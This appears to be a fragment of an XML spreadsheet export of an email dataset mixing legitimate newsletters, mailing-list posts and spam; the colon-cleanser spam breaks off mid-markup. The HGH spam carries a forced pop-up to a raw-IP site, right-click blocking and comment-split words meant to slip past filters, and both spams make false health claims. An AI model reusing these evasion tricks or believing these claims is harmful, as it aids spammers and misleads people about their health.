 		&lt;TD WIDTH="155"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/comics_email_header_logo.gif" WIDTH="155" HEIGHT="73" BORDER="0" ALT="Comics E-mail"&gt;&lt;/TD&gt;&lt;TD WIDTH="11"&gt;&lt;IMG SRC="http://www.comics.com/comics/dilbert/images/ad_dil.gif" WIDTH="11" HEIGHT="20" BORDER="0" ALT="Advertisement"&gt;&lt;/TD&gt;&lt;TD WIDTH="468"&gt;
 &lt;!-- BEGIN AD TAG 1 --&gt;
 &lt;A HREF="http://www.amazon.com/exec/obidos/redirect-home/unitedemail-20"&gt;&lt;IMG SRC="http://www.comics.com/images/ads/home-banner-468x60.gif" BORDER="0" HEIGHT="60" WIDTH="468" alt="In Association with Amazon.com"&gt;&lt;/A&gt;
 &lt;!-- END AD TAG 1 --&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR VALIGN="TOP"&gt;
 		&lt;TD WIDTH="634" COLSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/clear_dot.gif" BORDER="0" ALT="" WIDTH="634" HEIGHT="15"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- END BANNER AD TABLE --&gt;
 &lt;!-- BEGIN HEADER NAV TABLE --&gt;
 &lt;TABLE WIDTH="639" CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="15" VALIGN="BOTTOM"&gt;&lt;A HREF="http://www.comics.com/index.html"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/top_left_email_header.gif" ALT="Comics.com" WIDTH="15" HEIGHT="45" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="125" VALIGN="BOTTOM"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=47-ADxxIIZm1jKA33IOiYGwl3BfJ9RR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/comics_com_email_header.gif" ALT="Comics.com" WIDTH="125" HEIGHT="45" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="138" VALIGN="BOTTOM"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=5c-BnNPIZnUblLbt8C53AlMDVhbMRRR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/dilbert_email_header.gif" ALT="Dilbert.com" WIDTH="138" HEIGHT="45" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="146" VALIGN="BOTTOM"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=71-GwnUIEZQfHysdd1qwFBR5r2YBdRR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/snoopy_email_header.gif" ALT="Snoopy.com" WIDTH="146" HEIGHT="45" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="200" VALIGN="BOTTOM" BACKGROUND="http://www.comics.com/images/comicsmail/email_header_spacer.gif"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/email_header_spacer.gif" ALT="" WIDTH="200" HEIGHT="45" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="15" VALIGN="BOTTOM"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/top_right_email_header.gif" ALT="" WIDTH="15" HEIGHT="45" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- END HEADER NAV TABLE --&gt;
 &lt;!-- BEGIN MAIN CONTENT TABLE --&gt;
 &lt;TABLE WIDTH="639" CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="15" VALIGN="TOP" COLSPAN="2"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/top_left_email_comic.gif" ALT="" WIDTH="15" HEIGHT="10" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="609" VALIGN="TOP" BGCOLOR="#FFFFFF"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="609" HEIGHT="10" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="15" VALIGN="TOP" COLSPAN="2"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/top_right_email_comic.gif" ALT="" WIDTH="15" HEIGHT="10" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="3" VALIGN="TOP" BGCOLOR="#003366" ROWSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/003366_dot.gif" ALT="" WIDTH="3" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="12" VALIGN="TOP" BGCOLOR="#FFFFFF" ROWSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="12" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="609"&gt;
 			&lt;TABLE WIDTH="609" CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 				&lt;TR VALIGN="TOP"&gt;
 					&lt;TD WIDTH="609" BGCOLOR="#FFFFFF" COLSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="609" HEIGHT="3" BORDER="0"&gt;&lt;/TD&gt;
 				&lt;/TR&gt;
 				&lt;TR VALIGN="TOP"&gt;
 					&lt;TD WIDTH="245" BGCOLOR="#FFFFFF"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=86-8fo1QCJxnngkZRvSjVe9_shuZRRR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/logos/email_jumpstart_logo.gif" ALT="Jump Start" WIDTH="245" HEIGHT="65" BORDER="0"&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="245" HEIGHT="5" BORDER="0"&gt;&lt;BR&gt;&lt;FONT FACE="helvetica, arial" SIZE="2" COLOR="#336699"&gt;&lt;B&gt;By Robb Armstrong&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD WIDTH="94" BGCOLOR="#FFFFFF"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="94" HEIGHT="65" BORDER="0"&gt;&lt;/TD&gt;&lt;TD WIDTH="270" BGCOLOR="#FFFFFF"&gt;&lt;A HREF='http://ummail4.unitedmedia.com:80/Click?q=9c-xtCpQanwkQly1o-lXRIatIRbBsRR'&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/store/email_comic_strip_store.gif" ALT="" WIDTH="270" HEIGHT="65" BORDER="0"&gt;&lt;/A&gt;&lt;/A&gt;&lt;/TD&gt;
 				&lt;/TR&gt;
 				&lt;TR VALIGN="TOP"&gt;
 					&lt;TD WIDTH="609" BGCOLOR="#FFFFFF" COLSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="609" HEIGHT="6" BORDER="0"&gt;&lt;/TD&gt;
 				&lt;/TR&gt;
 			&lt;/TABLE&gt;
 		&lt;/TD&gt;
 		&lt;TD WIDTH="12" VALIGN="TOP" BGCOLOR="#FFFFFF" ROWSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="12" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="3" VALIGN="TOP" BGCOLOR="#003366" ROWSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/003366_dot.gif" ALT="" WIDTH="3" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR VALIGN="TOP" BGCOLOR="#FFFFFF"&gt;
 		&lt;TD WIDTH="609"&gt;
 			&lt;TABLE WIDTH="609" CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 				&lt;TR VALIGN="BOTTOM"&gt;
 					&lt;TD WIDTH="301" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="301" HEIGHT="10" BORDER="0"&gt;&lt;BR&gt;&lt;FONT FACE="helvetica, arial" SIZE="1" COLOR="#003366"&gt;&lt;B&gt;Hi Justin, enjoy your daily comic from &lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=b1-YzzzJQ-00zAibLYfr9n_ylHMYP9RR"&gt;&lt;FONT COLOR="#003366"&gt;Comics.com&lt;/FONT&gt;&lt;/A&gt;.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 					&lt;TD WIDTH="308" BGCOLOR="#FFFFFF" ALIGN="RIGHT"&gt;
 						&lt;TABLE WIDTH="308" CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 							&lt;TR VALIGN="BOTTOM"&gt;
 								&lt;TD WIDTH="152" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=c6-URl9QMLzguRGxzzWdh_IeLuxu9RR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/tellafriend.gif" ALT="Tell a Friend" WIDTH="152" HEIGHT="19" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 								&lt;TD WIDTH="4" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="4" HEIGHT="4" BORDER="0"&gt;&lt;/TD&gt;
 								&lt;TD WIDTH="152" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=db-rm79QJEz6m2ugNJvp1t9spLcVdRR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/choosecomics.gif" ALT="Choose Comics by Topic" WIDTH="152" HEIGHT="19" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 							&lt;/TR&gt;
 							&lt;TR VALIGN="BOTTOM"&gt;
 								&lt;TD WIDTH="308" BGCOLOR="#FFFFFF" ALIGN="LEFT" COLSPAN="3"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="308" HEIGHT="3" BORDER="0"&gt;&lt;/TD&gt;
 							&lt;/TR&gt;
 							&lt;TR VALIGN="BOTTOM"&gt;
 								&lt;TD WIDTH="152" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=f0-nvTDQWgtKiILCuR2fIf5OwrimdRR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/30dayarchive.gif" ALT="30 Day Archive" WIDTH="152" HEIGHT="19" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 								&lt;TD WIDTH="4" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="4" HEIGHT="4" BORDER="0"&gt;&lt;/TD&gt;
 								&lt;TD WIDTH="152" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=05-gDWLIG8ZRMfKcBnfn5DFHO-sYsRR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/modify.gif" ALT="Modify/Unsubscribe" WIDTH="152" HEIGHT="19" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 							&lt;/TR&gt;
 						&lt;/TABLE&gt;
 					&lt;/TD&gt;
 				&lt;/TR&gt;
 				&lt;TR VALIGN="TOP"&gt;
 					&lt;TD WIDTH="609" VALIGN="TOP" BGCOLOR="#FFFFFF" COLSPAN="2"&gt;&lt;IMG SRC="http://www.comics.com/comics/jumpstart/archive/images/jumpstart2002071741413.gif" BORDER="0" ALT="Today's Comic"&gt;&lt;BR&gt;&lt;/TD&gt;
 				&lt;/TR&gt;
 				&lt;TR VALIGN="BOTTOM"&gt;
 					&lt;TD WIDTH="301" BGCOLOR="#FFFFFF" ALIGN="LEFT"&gt;&lt;FONT FACE="helvetica, arial" SIZE="1" COLOR="#000000"&gt;07/13/2002&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 					&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=1a-y6PkIlXm6w-46-Kd5I04xuE5R9RR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/findnewfav_pearls.gif" ALT="Find New Favorites" WIDTH="120" HEIGHT="60" BORDER="0"&gt;&lt;/A&gt;&amp;nbsp;&amp;nbsp;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=2f-hYtFIqnKAaqTrWoP20D4jzt0Q9RR"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/ecard_icon.gif" ALT="Free E-cards" WIDTH="120" HEIGHT="60" BORDER="0"&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/TD&gt;
 					&lt;TD WIDTH="308" BGCOLOR="#FFFFFF" ALIGN="RIGHT"&gt;&lt;FONT FACE="helvetica, arial" SIZE="1" COLOR="#000000"&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT FACE="helvetica, arial" SIZE="1" COLOR="#336699"&gt;To report problems, e-mail &lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=45-fNgJIKBR8VjwpV7-EGvB0UNgJdRR"&gt;&lt;FONT COLOR="#336699"&gt;comicshelp@unitedmedia.com&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				&lt;/TR&gt;
 				&lt;TR VALIGN="TOP"&gt;
 					&lt;TD WIDTH="609" VALIGN="TOP" BGCOLOR="#FFFFFF" COLSPAN="2"&gt;&lt;IMG SRC="http://www.comics.com/images/ffcc00_dot.gif" ALT="" WIDTH="609" HEIGHT="1" BORDER="0"&gt;&lt;BR&gt;&lt;BR&gt;&lt;/TD&gt;
 				&lt;/TR&gt;
 			&lt;/TABLE&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR VALIGN="TOP" BGCOLOR="#FFFFFF" ALIGN="CENTER"&gt;
 		&lt;TD&gt;&lt;FONT FACE="helvetica, arial" SIZE="1" COLOR="#000000"&gt;&lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=5a-ahO1IP0JMGnYnDX24JOKBJC4zsRR"&gt;Comics on Your Site/Intranet&lt;/A&gt; | &lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=6f-3xY9IOL2bBgXWZM3RUvKTN9nPsRR"&gt;Comics in Your Publication&lt;/A&gt; | &lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=84-CCDyQ60lygpzAg0ZsnhhpYUoZsRR"&gt;Advertising Info&lt;/A&gt; | &lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=99-4mayQAdljO46vHU2HHfS87c8B9RR"&gt;Terms of Use&lt;/A&gt; | &lt;A HREF="http://ummail4.unitedmedia.com:80/Click?q=ae-jOB6QMB3LJla10j8-1hV197zDRRR"&gt;Privacy Policy&lt;/A&gt;&lt;/FONT&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="15" VALIGN="TOP" COLSPAN="2" ROWSPAN="2"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/bottom_left_email_comic.gif" ALT="" WIDTH="15" HEIGHT="10" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="609" VALIGN="TOP" BGCOLOR="#FFFFFF"&gt;&lt;IMG SRC="http://www.comics.com/images/ffffff_dot.gif" ALT="" WIDTH="609" HEIGHT="7" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="15" VALIGN="TOP" COLSPAN="2" ROWSPAN="2"&gt;&lt;IMG SRC="http://www.comics.com/images/comicsmail/bottom_right_email_comic.gif" ALT="" WIDTH="15" HEIGHT="10" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="609" VALIGN="TOP" BGCOLOR="#003366"&gt;&lt;IMG SRC="http://www.comics.com/images/003366_dot.gif" ALT="" HEIGHT="3" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- END MAIN CONTENT TABLE --&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;script language="JavaScript"&gt;
 &lt;!--
 document.writeln ('&lt;layer SRC="http://ads.inet1.com/html-bin/adselect-iframe.asp?obnum=700386&amp;var=' + same + '" visibility="hidden" width=468 height=60 onload="moveToAbsolute(ph1.pageX,ph1.pageY);clip.width=468;clip.height=60;visibility=\'show\';"&gt;&lt;/layer&gt;');
 //--&gt;
 &lt;/script&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://ummail4.unitedmedia.com:80/Click?q=c3-x1eC-SLmNf0zEEQIv7RpNFrL"&gt;
 --6700390.1026560924954.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body onload="window.open('http://202.101.163.34:81/ultimatehgh_run/')" bgColor="#99ff99" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;&lt;!--zzzz--&gt;&lt;!----&gt;Hello, jm@example.com&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Hu&lt;!----&gt;man Growth Horm&lt;!----&gt;one Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;
 As seen on NBC, CBS, and CNN, and even Oprah! The health&lt;br&gt;
 discovery that actually reverses aging while burning fat,&lt;br&gt;
 without dieting or exercise! This proven discovery has even&lt;br&gt;
 been reported on by the New England Journal of Medicine.&lt;br&gt;
 Forget aging and dieting forever! And it's Guaranteed!&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;
       &lt;td height="96" width="247"&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;
           Duration Of Penile Erection&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
       &lt;td height="96" width="222"&gt;
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;
 &lt;p align="center"&gt;&lt;a href="http://211.99.37.206:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;&lt;br&gt;
   Visit Our Web Site and Learn The Facts : Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   If the above link is not operational, Please &lt;a href="http://211.98.24.90:81/ultimatehgh_run/"&gt;&lt;b&gt;Click 
   Here&lt;/b&gt;&lt;/a&gt; again.&lt;br&gt;
   &lt;br&gt;
   &lt;br&gt;
   You are receiving this email as a subscr&lt;!--zzzz--&gt;iber&lt;br&gt;
   to the Opt&lt;!--zzzz--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
   To remo&lt;!--zzzz--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
   just &lt;a href="http://202.96.124.10:81/ultimatehgh_run/remove.php?userid=zzzz@example.com"&gt;Click 
   Here&lt;/a&gt;&lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">IAB: That is a GOOD think about South Korea.  Not a bad thing.
 That is easy to see, since the people of India would like to have more
 of what SK has ...
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Robert
 &gt; Harley
 &gt; Sent: Wednesday, August 21, 2002 3:10 AM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: The Curse of India's Socialism
 &gt; 
 &gt; IAB wrote:
 &gt; &gt;This of course came at the expense of the environment: widespread air
 &gt; &gt;and water pollution, etc.: South Korea is the 10th largest CO2
 &gt; &gt;polluter in the world, despite ranking 26th in population.
 &gt; 
 &gt; CO2 is pollution?  And here I am going around metabolizing glucose and
 &gt; exhaling carbon dioxide every four seconds since I was a kid!  Why
 &gt; didn't anybody tell me?!?  I'll hold my breath from now on.  Honest
 guv.
 &gt; 
 &gt; R
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin wrote:
 &gt; am i the only one who thinks this is like "friday night 80's" for ilug?
 &gt; and here's an answer from 1989.  for those perceptive folks in the
 &gt; audience you'll note that it makes no reference to a windows icons.
 &lt;snip&gt;
 &gt; so yeah, unrm would be nice, but obviously it's not a simple problem.
 &gt; millions of lines of code, hundreds of projects, no unrm.  heck, the
 &gt; hurd will probably release 1.0 before unrm shows up.
 So what this tells us is:
 1) There are very few new ideas.
 2) Problems exists until someone gets annoyed enough to actually fix them
 rather than find bizarre ways to solve the problem.
 3) I have too much creative time on my hands with not enough productive
 time.
 &gt;&gt;From which we can infer that no work on unrm will be happening on my
 computer for a long time.
 :)
 - Matthew
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.comm
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Guido van Rossum &lt;guido@python.org&gt; is all like:
 &gt; &gt; Basic procmail usage goes something like this:
 &gt; &gt; 
 &gt; &gt;     :0fw
 &gt; &gt;     | spamassassin -P
 &gt; &gt; 
 &gt; &gt;     :0
 &gt; &gt;     * ^X-Spam-Status: Yes
 &gt; &gt;     $SPAM
 &gt; &gt; 
 &gt; 
 &gt; Do you feel capable of writing such a tool?  It doesn't look too hard.
 Not to beat a dead horse, but that's exactly what my spamcan package
 did.  For those just tuning in, spamcan is a thingy I wrote before I
 knew about Tim &amp; co's work on this crazy stuff; you can download it from
 &lt;http://woozle.org/~neale/src/spamcan/spamcan.html&gt;, but I'm not going
 to work on it anymore.
 I'm currently writing a new one based on classifier (and timtest's
 booty-kicking tokenizer).  I'll probably have something soon, like maybe
 half an hour, and no, it's not too hard.  The hard part is storing the
 data somewhere.  I don't want to use ZODB, as I'd like something a
 person can just drop in with a default Python install.  So anydbm is
 looking like my best option.
 I already have a setup like this using Xavier Leroy's SpamOracle, which
 does the same sort of thing.  You call it from procmail, it adds a new
 header, and then you can filter on that header.  Really easy.
 Here's how I envision this working.  Everybody gets four new mailboxes:
   train-eggs
   train-spam
   trained-eggs
   trained-spam
 You copy all your spam and eggs* into the "train-" boxes as you get it.
 How frequently you do this would be up to you, but you'd get better
 results if you did it more often, and you'd be wise to always copy over
 anything which was misclassified.  Then, every night, the spam fairy
 swoops down and reads through your folders, learning about what sorts of
 things you think are eggs and what sorts of things are spam.  After she's
 done, she moves your mail into the "trained-" folders.
 This would work for anybody using IMAP on a Unix box, or folks who read
 their mail right off the server.  I've spoken with some fellows at work
 about Exchange and they seem to beleive that Exchange exports
 appropriate functionality to implement a spam fairy as well.
 Advanced users could stay ahead of the game by reprogramming their mail
 client to bind the key "S" to "move to train-spam" and "H" to "move to
 train-eggs".  Eventually, if enough people used this sort of thing, it'd
 start showing up in mail clients.  That's the "delete as spam" button
 Paul Graham was talking about.
 * The Hormel company might not think well of using the word "ham" as the
   opposite of "spam", and they've been amazingly cool about the use of
   their product name for things thus far.  So I propose we start calling
   non-spam something more innocuous (and more Monty Pythonic) such as
   "eggs".
 Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EXTREME COLON CLEANSER16704
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;center&gt;
 &lt;center&gt;
 &lt;table border=3D"3" cellpadding=3D"2" bordercolor=3D"#C0C0C0" width=3D"80%=
 " id=3D"AutoNumber1" bgcolor=3D"#CCCCFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%"&gt;
 &lt;center&gt;
 &lt;center&gt;
 &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-co=
 llapse: collapse" bordercolor=3D"#111111" width=3D"100%" id=3D"AutoNumber8=
 "&gt;
   &lt;tr&gt;
     &lt;td width=3D"60%"&gt;
     &amp;nbsp;&lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D=
 "border-collapse: collapse" bordercolor=3D"#111111" width=3D"100%" id=3D"A=
 utoNumber9"&gt;
       &lt;tr&gt;
         &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Trebuchet MS, Arial"&gt;
         &lt;font color=3D"black" face=3D"Geneva, Arial, Helvetica, san-serif"=
 &gt;
         &lt;b&gt;CLEANSE YOUR BODY &lt;/b&gt;&lt;font color=3D"red"&gt;&lt;b&gt;NATURALLY !&lt;/b&gt;&lt;/f=
 ont&gt;&lt;b&gt;&lt;br&gt;
         FEEL HEALTHY &lt;/b&gt;&lt;font color=3D"red"&gt;&lt;b&gt;TODAY&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;fo=
 nt color=3D"#FF0000" face=3D"Geneva, Arial, Helvetica, san-serif"&gt;&lt;b&gt; 
         !&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Geneva, Arial, Helvetica, san-serif"&gt;&lt;b&gt;=
 &lt;br&gt;
         &lt;font color=3D"black"&gt;YOU HAVE THE POWER TO HELP PREVENT
         &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Trebuchet MS, Arial"&gt;
         &lt;font face=3D"Tahoma" color=3D"#ff0000"&gt;CANCER 
         !&lt;/font&gt;&lt;font face=3D"Geneva, Arial, Helvetica, san-serif"&gt;&lt;br&gt;
         &lt;font color=3D"#000000"&gt;YOU HAVE THE POWER TO RID YOUR BODY 
         OF UNWANTED &lt;/font&gt;&lt;/font&gt;
         &lt;font face=3D"Tahoma" color=3D"#ff0000"&gt;TOXINS 
         !&lt;br&gt;&lt;/font&gt;&lt;/font&gt;
         &lt;font color=3D"black" size=3D"4" face=3D"Trebuchet MS, Arial"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font color=3D"black" face=3D"Arial" size=3D"2"&gt;This pr=
 oduct was 
         designed to aid in the bodies digestive system. It is made up of 1=
 1 all 
         natural herbs. These herbs break down the foods that we eat and pa=
 ss 
         them through the body more easily. &lt;b&gt;Extreme Colon Cleanser&lt;/b&gt; i=
 s not a harsh 
         laxative. It is a safe and natural way to help regulate your syste=
 m. &lt;b&gt;NOW&lt;/b&gt; 
         is the time to act.&lt;b&gt; You have &lt;font color=3D"red"&gt;ABSOLUTELY NOT=
 HING&lt;/font&gt; 
         to lose. I back this auction with an unmatched 100% LIFETIME GUARA=
 NTEE&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2"&gt;
         &lt;span style=3D"background-color: #FFFF00"&gt;
         &lt;a href=3D"http://www.youremaildeals.com/diet/ingre2.shtml" style=3D=
 "text-decoration: none"&gt;
         &lt;font color=3D"#000000"&gt;Click &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;HERE&lt;=
 /font&gt;&lt;font color=3D"#000000"&gt; 
         to see the ingredients and how they work&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;=
 /b&gt;&lt;/p&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
       &lt;tr&gt;
         &lt;td width=3D"100%"&gt;
         &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"b=
 order-collapse: collapse" bordercolor=3D"#111111" width=3D"100%" id=3D"Aut=
 oNumber10"&gt;
           &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
       &lt;p align=3D"center"&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;center&gt;
 &lt;p&gt;
             &lt;font face=3D"Geneva, Arial, Helvetica, san-serif" size=3D"4"&gt;
 &lt;b&gt;
 &lt;i&gt;
 &lt;font color=3D"#000000"&gt;
